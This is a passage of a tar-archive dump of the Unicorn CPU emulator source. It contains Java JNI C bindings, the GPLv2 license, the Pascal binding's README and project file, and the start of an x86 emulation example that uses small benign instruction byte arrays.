jobject read_cb, jobject user_data_read, jobject write_cb, jobject user_data_write) { struct hook_wrapper *hooks[2] = {0}; if (read_cb) { hooks[0] = makeHookWrapper(env, self, read_cb, user_data_read, "read", sig_MmioReadHandler); if (!hooks[0]) { goto fail; } } if (write_cb) { hooks[1] = makeHookWrapper(env, self, write_cb, user_data_write, "write", sig_MmioWriteHandler); if (!hooks[1]) { goto fail; } } jlong hooksLong[2]; size_t hooksCount = 0; if (hooks[0]) hooksLong[hooksCount++] = (jlong)hooks[0]; if (hooks[1]) hooksLong[hooksCount++] = (jlong)hooks[1]; jlongArray result = (*env)->NewLongArray(env, hooksCount); if (result == NULL) { goto fail; } (*env)->SetLongArrayRegion(env, result, 0, hooksCount, hooksLong); uc_err err = uc_mmio_map((uc_engine *)uc, address, size, (hooks[0] ? cb_mmio_read : NULL), hooks[0], (hooks[1] ? cb_mmio_write : NULL), hooks[1]); if (err != UC_ERR_OK) { throwUnicornException(env, err); goto fail; } return result; fail: deleteHookWrapper(env, hooks[0]); deleteHookWrapper(env, hooks[1]); return NULL; } /* * Class: unicorn_Unicorn * Method: _mem_map * Signature: (JJJI)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1mem_1map(JNIEnv *env, jclass clazz, jlong uc, jlong address, jlong size, jint perms) { uc_err err = uc_mem_map((uc_engine *)uc, address, size, perms); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _mem_map_ptr * Signature: (JJLjava/nio/Buffer;I)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1mem_1map_1ptr( JNIEnv *env, jclass clazz, jlong uc, jlong address, jobject buf, jint perms) { jlong size = (*env)->GetDirectBufferCapacity(env, buf); void *host_address = (*env)->GetDirectBufferAddress(env, buf); if (size < 0 || host_address == NULL) { throwCustomUnicornException(env, "mem_map_ptr requires a direct buffer"); return; } uc_err err = uc_mem_map_ptr((uc_engine *)uc, address, size, perms, host_address); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _mem_unmap * Signature: (JJJ)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1mem_1unmap(JNIEnv *env, jclass clazz, jlong uc, jlong address, jlong size) { uc_err err = uc_mem_unmap((uc_engine *)uc, address, size); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _mem_protect * Signature: (JJJI)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1mem_1protect( JNIEnv *env, jclass clazz, jlong uc, jlong address, jlong size, jint perms) { uc_err err = uc_mem_protect((uc_engine *)uc, address, size, perms); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _mem_regions * Signature: (J)[Lunicorn/MemRegion; */ JNIEXPORT jobjectArray JNICALL Java_unicorn_Unicorn__1mem_1regions(JNIEnv *env, jclass uc_clazz, jlong uc) { static jclass clazz; if (!clazz) { clazz = (*env)->FindClass(env, "unicorn/MemRegion"); if (!clazz) return NULL; clazz = (*env)->NewGlobalRef(env, clazz); if (!clazz) return NULL; } static jmethodID clazzInit; if (!clazzInit) { clazzInit = (*env)->GetMethodID(env, clazz, "<init>", "(JJI)V"); if (!clazzInit) return NULL; } uc_mem_region *regions = NULL; uint32_t count = 0; uint32_t i; uc_err err = uc_mem_regions((uc_engine *)uc, &regions, &count); if (err != UC_ERR_OK) { throwUnicornException(env, err); return NULL; } jobjectArray result = (*env)->NewObjectArray(env, (jsize)count, clazz, NULL); if (!result) { uc_free(regions); return NULL; } for (i = 0; i < count; i++) {
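/* Box each native uc_mem_region into a unicorn/MemRegion object through the
   constructor resolved above; the class and constructor IDs are kept in
   function-local statics so the JNI lookup happens only once per process. */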
jobject mr = (*env)->NewObject(env, clazz, clazzInit, (jlong)regions[i].begin, (jlong)regions[i].end, (jint)regions[i].perms); if (!mr) { uc_free(regions); return NULL; } (*env)->SetObjectArrayElement(env, result, (jsize)i, mr); } uc_free(regions); return result; } /* * Class: unicorn_Unicorn * Method: _context_alloc * Signature: (J)J */ JNIEXPORT jlong JNICALL Java_unicorn_Unicorn__1context_1alloc(JNIEnv *env, jclass clazz, jlong uc) { uc_context *ctx; uc_err err = uc_context_alloc((uc_engine *)uc, &ctx); if (err != UC_ERR_OK) { throwUnicornException(env, err); return 0; } return (jlong)ctx; } /* * Class: unicorn_Unicorn * Method: _context_free * Signature: (J)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1context_1free(JNIEnv *env, jclass clazz, jlong ctx) { uc_err err = uc_context_free((uc_context *)ctx); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _context_save * Signature: (JJ)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1context_1save(JNIEnv *env, jclass clazz, jlong uc, jlong ctx) { uc_err err = uc_context_save((uc_engine *)uc, (uc_context *)ctx); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _context_restore * Signature: (JJ)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1context_1restore(JNIEnv *env, jclass clazz, jlong uc, jlong ctx) { uc_err err = uc_context_restore((uc_engine *)uc, (uc_context *)ctx); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _ctl_get_mode * Signature: (J)I */ JNIEXPORT jint JNICALL Java_unicorn_Unicorn__1ctl_1get_1mode(JNIEnv *env, jclass clazz, jlong uc) { int mode; uc_err err = uc_ctl_get_mode((uc_engine *)uc, &mode); if (err != UC_ERR_OK) { throwUnicornException(env, err); return 0; } return mode; } /* * Class: unicorn_Unicorn * Method: _ctl_get_arch * Signature: (J)I */ JNIEXPORT jint JNICALL Java_unicorn_Unicorn__1ctl_1get_1arch(JNIEnv *env, jclass clazz, jlong uc) { int arch; uc_err err = uc_ctl_get_arch((uc_engine *)uc, &arch); if (err != UC_ERR_OK) { throwUnicornException(env, err); return 0; } return arch; } /* * Class: unicorn_Unicorn * Method: _ctl_get_timeout * Signature: (J)J */ JNIEXPORT jlong JNICALL Java_unicorn_Unicorn__1ctl_1get_1timeout(JNIEnv *env, jclass clazz, jlong uc) { uint64_t timeout; uc_err err = uc_ctl_get_timeout((uc_engine *)uc, &timeout); if (err != UC_ERR_OK) { throwUnicornException(env, err); return 0; } return timeout; } /* * Class: unicorn_Unicorn * Method: _ctl_get_page_size * Signature: (J)I */ JNIEXPORT jint JNICALL Java_unicorn_Unicorn__1ctl_1get_1page_1size(JNIEnv *env, jclass clazz, jlong uc) { uint32_t page_size; uc_err err = uc_ctl_get_page_size((uc_engine *)uc, &page_size); if (err != UC_ERR_OK) { throwUnicornException(env, err); return 0; } return page_size; } /* * Class: unicorn_Unicorn * Method: _ctl_set_page_size * Signature: (JI)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1ctl_1set_1page_1size( JNIEnv *env, jclass clazz, jlong uc, jint page_size) { uc_err err = uc_ctl_set_page_size((uc_engine *)uc, (uint32_t)page_size); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _ctl_set_use_exits * Signature: (JZ)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1ctl_1set_1use_1exits( JNIEnv *env, jclass clazz, jlong uc, jboolean value) { uc_err err; if (value) { err = uc_ctl_exits_enable((uc_engine *)uc); } else { err = uc_ctl_exits_disable((uc_engine *)uc); } 
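/* Hedged note: with exits enabled, uc_emu_start() is expected to stop at the
   addresses configured through _ctl_set_exits rather than only at its "until"
   argument. A minimal Java-side sketch, assuming the public wrappers in
   unicorn/Unicorn.java mirror these native names (hypothetical call names):

       u.ctl_set_use_exits(true);
       u.ctl_set_exits(new long[] {ADDRESS + 6});
       u.emu_start(ADDRESS, 0, 0, 0); // stops at ADDRESS + 6
*/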
if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _ctl_get_exits_cnt * Signature: (J)J */ JNIEXPORT jlong JNICALL Java_unicorn_Unicorn__1ctl_1get_1exits_1cnt(JNIEnv *env, jclass clazz, jlong uc) { size_t exits_cnt; uc_err err = uc_ctl_get_exits_cnt((uc_engine *)uc, &exits_cnt); if (err != UC_ERR_OK) { throwUnicornException(env, err); return 0; } return exits_cnt; } /* * Class: unicorn_Unicorn * Method: _ctl_get_exits * Signature: (J)[J */ JNIEXPORT jlongArray JNICALL Java_unicorn_Unicorn__1ctl_1get_1exits(JNIEnv *env, jclass clazz, jlong uc) { size_t exits_cnt; uc_err err = uc_ctl_get_exits_cnt((uc_engine *)uc, &exits_cnt); if (err != UC_ERR_OK) { throwUnicornException(env, err); return 0; } jlongArray result = (*env)->NewLongArray(env, (jsize)exits_cnt); if (!result) return NULL; jlong *resultArr = (*env)->GetLongArrayElements(env, result, NULL); if (!resultArr) return NULL; err = uc_ctl_get_exits((uc_engine *)uc, (uint64_t *)resultArr, exits_cnt); (*env)->ReleaseLongArrayElements(env, result, resultArr, 0); if (err != UC_ERR_OK) { throwUnicornException(env, err); return 0; } return result; } /* * Class: unicorn_Unicorn * Method: _ctl_set_exits * Signature: (J[J)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1ctl_1set_1exits(JNIEnv *env, jclass clazz, jlong uc, jlongArray exits) { jsize count = (*env)->GetArrayLength(env, exits); jlong *arr = (*env)->GetLongArrayElements(env, exits, NULL); if (!arr) return; uc_err err = uc_ctl_set_exits((uc_engine *)uc, (uint64_t *)arr, (size_t)count); (*env)->ReleaseLongArrayElements(env, exits, arr, JNI_ABORT); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _ctl_get_cpu_model * Signature: (J)I */ JNIEXPORT jint JNICALL Java_unicorn_Unicorn__1ctl_1get_1cpu_1model(JNIEnv *env, jclass clazz, jlong uc) { int cpu_model; uc_err err = uc_ctl_get_cpu_model((uc_engine *)uc, &cpu_model); if (err != UC_ERR_OK) { throwUnicornException(env, err); return 0; } return cpu_model; } /* * Class: unicorn_Unicorn * Method: _ctl_set_cpu_model * Signature: (JI)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1ctl_1set_1cpu_1model( JNIEnv *env, jclass clazz, jlong uc, jint cpu_model) { uc_err err = uc_ctl_set_cpu_model((uc_engine *)uc, (int)cpu_model); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _ctl_request_cache * Signature: (JJ)Lunicorn/TranslationBlock; */ JNIEXPORT jobject JNICALL Java_unicorn_Unicorn__1ctl_1request_1cache( JNIEnv *env, jclass clazz, jlong uc, jlong address) { uc_tb tb; uc_err err = uc_ctl_request_cache((uc_engine *)uc, (uint64_t)address, &tb); if (err != UC_ERR_OK) { throwUnicornException(env, err); return NULL; } return makeTranslationBlock(env, &tb); } /* * Class: unicorn_Unicorn * Method: _ctl_remove_cache * Signature: (JJJ)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1ctl_1remove_1cache( JNIEnv *env, jclass clazz, jlong uc, jlong address, jlong end) { uc_err err = uc_ctl_remove_cache((uc_engine *)uc, (uint64_t)address, (uint64_t)end); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _ctl_flush_tb * Signature: (J)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1ctl_1flush_1tb(JNIEnv *env, jclass clazz, jlong uc) { uc_err err = uc_ctl_flush_tb((uc_engine *)uc); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _ctl_flush_tlb * Signature: (J)V */ 
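/* (_ctl_flush_tb above discards cached translated blocks, i.e. compiled
   guest code; _ctl_flush_tlb below drops the emulated MMU's
   address-translation cache. They flush two different caches.) */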
JNIEXPORT void JNICALL Java_unicorn_Unicorn__1ctl_1flush_1tlb(JNIEnv *env, jclass clazz, jlong uc) { uc_err err = uc_ctl_flush_tlb((uc_engine *)uc); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } /* * Class: unicorn_Unicorn * Method: _ctl_tlb_mode * Signature: (JI)V */ JNIEXPORT void JNICALL Java_unicorn_Unicorn__1ctl_1tlb_1mode(JNIEnv *env, jclass clazz, jlong uc, jint mode) { uc_err err = uc_ctl_tlb_mode((uc_engine *)uc, (int)mode); if (err != UC_ERR_OK) { throwUnicornException(env, err); return; } } unicorn-2.1.1/bindings/pascal/000077500000000000000000000000001467524106700162445ustar00rootroot00000000000000unicorn-2.1.1/bindings/pascal/LICENSE000066400000000000000000000431301467524106700172520ustar00rootroot00000000000000GNU GENERAL PUBLIC LICENSE Version 2, June 1991 Copyright (C) 1989, 1991 Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The licenses for most software are designed to take away your freedom to share and change it. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change free software--to make sure the software is free for all its users. This General Public License applies to most of the Free Software Foundation's software and to any other program whose authors commit to using it. (Some other Free Software Foundation software is covered by the GNU Lesser General Public License instead.) You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for this service if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs; and that you know you can do these things. To protect your rights, we need to make restrictions that forbid anyone to deny you these rights or to ask you to surrender the rights. These restrictions translate to certain responsibilities for you if you distribute copies of the software, or if you modify it. For example, if you distribute copies of such a program, whether gratis or for a fee, you must give the recipients all the rights that you have. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. We protect your rights with two steps: (1) copyright the software, and (2) offer you this license which gives you legal permission to copy, distribute and/or modify the software. Also, for each author's protection and ours, we want to make certain that everyone understands that there is no warranty for this free software. If the software is modified by someone else and passed on, we want its recipients to know that what they have is not the original, so that any problems introduced by others will not reflect on the original authors' reputations. Finally, any free program is threatened constantly by software patents. We wish to avoid the danger that redistributors of a free program will individually obtain patent licenses, in effect making the program proprietary. To prevent this, we have made it clear that any patent must be licensed for everyone's free use or not licensed at all. The precise terms and conditions for copying, distribution and modification follow. 
GNU GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 0. This License applies to any program or other work which contains a notice placed by the copyright holder saying it may be distributed under the terms of this General Public License. The "Program", below, refers to any such program or work, and a "work based on the Program" means either the Program or any derivative work under copyright law: that is to say, a work containing the Program or a portion of it, either verbatim or with modifications and/or translated into another language. (Hereinafter, translation is included without limitation in the term "modification".) Each licensee is addressed as "you". Activities other than copying, distribution and modification are not covered by this License; they are outside its scope. The act of running the Program is not restricted, and the output from the Program is covered only if its contents constitute a work based on the Program (independent of having been made by running the Program). Whether that is true depends on what the Program does. 1. You may copy and distribute verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and give any other recipients of the Program a copy of this License along with the Program. You may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in exchange for a fee. 2. You may modify your copy or copies of the Program or any portion of it, thus forming a work based on the Program, and copy and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions: a) You must cause the modified files to carry prominent notices stating that you changed the files and the date of any change. b) You must cause any work that you distribute or publish, that in whole or in part contains or is derived from the Program or any part thereof, to be licensed as a whole at no charge to all third parties under the terms of this License. c) If the modified program normally reads commands interactively when run, you must cause it, when started running for such interactive use in the most ordinary way, to print or display an announcement including an appropriate copyright notice and a notice that there is no warranty (or else, saying that you provide a warranty) and that users may redistribute the program under these conditions, and telling the user how to view a copy of this License. (Exception: if the Program itself is interactive but does not normally print such an announcement, your work based on the Program is not required to print an announcement.) These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the Program, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the Program, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. 
Thus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is to exercise the right to control the distribution of derivative or collective works based on the Program. In addition, mere aggregation of another work not based on the Program with the Program (or with a work based on the Program) on a volume of a storage or distribution medium does not bring the other work under the scope of this License. 3. You may copy and distribute the Program (or a work based on it, under Section 2) in object code or executable form under the terms of Sections 1 and 2 above provided that you also do one of the following: a) Accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, b) Accompany it with a written offer, valid for at least three years, to give any third party, for a charge no more than your cost of physically performing source distribution, a complete machine-readable copy of the corresponding source code, to be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, c) Accompany it with the information you received as to the offer to distribute corresponding source code. (This alternative is allowed only for noncommercial distribution and only if you received the program in object code or executable form with such an offer, in accord with Subsection b above.) The source code for a work means the preferred form of the work for making modifications to it. For an executable work, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the executable. However, as a special exception, the source code distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable. If distribution of executable or object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place counts as distribution of the source code, even though third parties are not compelled to copy the source along with the object code. 4. You may not copy, modify, sublicense, or distribute the Program except as expressly provided under this License. Any attempt otherwise to copy, modify, sublicense or distribute the Program is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance. 5. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to modify or distribute the Program or its derivative works. These actions are prohibited by law if you do not accept this License. Therefore, by modifying or distributing the Program (or any work based on the Program), you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or modifying the Program or works based on it. 6. 
Each time you redistribute the Program (or any work based on the Program), the recipient automatically receives a license from the original licensor to copy, distribute or modify the Program subject to these terms and conditions. You may not impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties to this License. 7. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Program at all. For example, if a patent license would not permit royalty-free redistribution of the Program by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Program. If any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is intended to apply and the section as a whole is intended to apply in other circumstances. It is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of any such claims; this section has the sole purpose of protecting the integrity of the free software distribution system, which is implemented by public license practices. Many people have made generous contributions to the wide range of software distributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he or she is willing to distribute software through any other system and a licensee cannot impose that choice. This section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License. 8. If the distribution and/or use of the Program is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Program under this License may add an explicit geographical distribution limitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such case, this License incorporates the limitation as if written in the body of this License. 9. The Free Software Foundation may publish revised and/or new versions of the General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies a version number of this License which applies to it and "any later version", you have the option of following the terms and conditions either of that version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of this License, you may choose any version ever published by the Free Software Foundation. 10. If you wish to incorporate parts of the Program into other free programs whose distribution conditions are different, write to the author to ask for permission. 
For software which is copyrighted by the Free Software Foundation, write to the Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally. NO WARRANTY 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively convey the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. Copyright (C) 2018 Coldzer0 This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Also add information on how to contact you by electronic and paper mail. If the program is interactive, make it output a short notice like this when it starts in an interactive mode: Gnomovision version 69, Copyright (C) year name of author Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, the commands you use may be called something other than `show w' and `show c'; they could even be mouse-clicks or menu items--whatever suits your program. 
You should also get your employer (if you work as a programmer) or your school, if any, to sign a "copyright disclaimer" for the program, if necessary. Here is a sample; alter the names: Yoyodyne, Inc., hereby disclaims all copyright interest in the program `Gnomovision' (which makes passes at compilers) written by James Hacker. {signature of Ty Coon}, 1 April 1989 Ty Coon, President of Vice This General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Lesser General Public License instead of this License.unicorn-2.1.1/bindings/pascal/README.md000066400000000000000000000024271467524106700175300ustar00rootroot00000000000000# unicorn-engine-pascal Pascal/Delphi language binding for the [Unicorn emulator](http://www.unicorn-engine.org/) ([GitHub](https://github.com/unicorn-engine/unicorn)). *Unicorn* is a lightweight multi-platform, multi-architecture CPU emulator framework based on [QEMU](http://www.qemu.org/). ## License `GPLv2` ## Compiler Compatibility #### Free Pascal >= v3 - `Mac OS` - `Windows` - `Linux` #### Delphi - `Windows` ## Features * Same API as the C core - with some workarounds for Pascal's case insensitivity: `uc_mem_write()` -> `uc_mem_write_()`, `uc_mem_read()` -> `uc_mem_read_()` - and for Pascal's lack of C-style variadic arguments (`...`): these are replaced by `args : Array of Const;`, so the extra arguments are passed inside `[]`, like: ```pascal uc_hook_add(uc, trace, UC_HOOK_INSN, @HookIn, nil, 1, 0, [UC_X86_INS_IN]); ``` The main loader is in `Unicorn_dyn.pas`; see the X86 example for more details. * Multiplatform (Mac OS, Windows and Linux are tested) ## Examples * `X86` Emulate 16, 32 and 64 bit x86 ## Version History * `1.1` * Add Delphi compatibility [Windows] * `1.0` * First version; covers all APIs of Unicorn v1.0.1 ## TODO - Add more examples - Add Mac and Linux support for Delphiunicorn-2.1.1/bindings/pascal/examples/000077500000000000000000000000001467524106700200625ustar00rootroot00000000000000unicorn-2.1.1/bindings/pascal/examples/x86.lpi000066400000000000000000000056411467524106700212230ustar00rootroot00000000000000 <UseAppBundle Value="False"/> <ResourceType Value="res"/> </General> <BuildModes Count="3"> <Item1 Name="Default" Default="True"/> <Item2 Name="Debug"> <CompilerOptions> <Version Value="11"/> <Target> <Filename Value="x86"/> </Target> <SearchPaths> <IncludeFiles Value="$(ProjOutDir)"/> <OtherUnitFiles Value="../unicorn"/> <UnitOutputDirectory Value="lib/$(TargetCPU)-$(TargetOS)"/> </SearchPaths> <Linking> <Debugging> <UseHeaptrc Value="True"/> <TrashVariables Value="True"/> <UseExternalDbgSyms Value="True"/> </Debugging> </Linking> </CompilerOptions> </Item2> <Item3 Name="Release"> <CompilerOptions> <Version Value="11"/> <Target> <Filename Value="x86"/> </Target> <SearchPaths> <IncludeFiles Value="$(ProjOutDir)"/> <OtherUnitFiles Value="../unicorn"/> <UnitOutputDirectory Value="lib/$(TargetCPU)-$(TargetOS)"/> </SearchPaths> <CodeGeneration> <SmartLinkUnit Value="True"/> <Optimizations> <OptimizationLevel Value="3"/> </Optimizations> </CodeGeneration> <Linking> <Debugging> <GenerateDebugInfo Value="False"/> </Debugging> <LinkSmart Value="True"/> </Linking> </CompilerOptions> </Item3> </BuildModes> <PublishOptions> <Version Value="2"/> </PublishOptions> <RunParams> <local> <FormatVersion Value="1"/> <CommandLineParams
Value="-32"/> </local> </RunParams> <Units Count="1"> <Unit0> <Filename Value="x86.lpr"/> <IsPartOfProject Value="True"/> </Unit0> </Units> </ProjectOptions> <CompilerOptions> <Version Value="11"/> <Target> <Filename Value="x86"/> </Target> <SearchPaths> <IncludeFiles Value="$(ProjOutDir)"/> <OtherUnitFiles Value="../unicorn"/> <UnitOutputDirectory Value="lib/$(TargetCPU)-$(TargetOS)"/> </SearchPaths> </CompilerOptions> <Debugging> <Exceptions Count="3"> <Item1> <Name Value="EAbort"/> </Item1> <Item2> <Name Value="ECodetoolError"/> </Item2> <Item3> <Name Value="EFOpenError"/> </Item3> </Exceptions> </Debugging> </CONFIG> �����������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/pascal/examples/x86.lpr������������������������������������������������������0000664�0000000�0000000�00000076754�14675241067�0021251�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������{ FreePascal/Delphi bindings for the UnicornEngine Emulator Engine . Copyright(c) 2018 Coldzer0 . License : GPLv2 . } program x86; {$IFDEF FPC} {$MODE Delphi} {$ENDIF} {$ifdef MSWINDOWS} {$apptype CONSOLE} {$endif} uses SysUtils, Unicorn_dyn, UnicornConst, X86Const; const // code to be emulated . X86_CODE32: array[0..6] of Byte = ($41, $4a,$66,$0f,$ef,$c1, $00); // INC ecx; DEC edx ; PXOR xmm0, xmm1 ; X86_CODE32_JUMP: array[0..8] of Byte = ($eb, $02, $90, $90, $90, $90, $90, $90, $00); // jmp 4; nop; nop; nop; nop; nop; nop ; X86_CODE32_LOOP: array[0..4] of Byte = ($41, $4a, $eb, $fe, $00); // INC ecx; DEC edx; JMP self-loop X86_CODE32_MEM_WRITE: array[0..8] of Byte = ($89, $0d, $aa, $aa, $aa, $aa, $41, $4a, $00); // mov [0xaaaaaaaa], ecx; INC ecx; DEC edx ; X86_CODE32_MEM_READ: array[0..8] of Byte = ($8b, $0d, $aa, $aa, $aa, $aa, $41, $4a, $00); // mov ecx,[0xaaaaaaaa]; INC ecx; DEC edx ; X86_CODE32_JMP_INVALID: array[0..6] of Byte = ($e9, $e9, $ee, $ee, $41, $4a, $00); // JMP outside; INC ecx; DEC edx ; X86_CODE32_INOUT: array[0..7] of Byte = ($41, $E4, $3F, $4a, $E6, $46, $43, $00); // INC ecx; IN AL, 0x3f; DEC edx; OUT 0x46, AL; INC ebx ; X86_CODE32_INC : array[0..1] of byte = ($40,$00); // INC eax . 
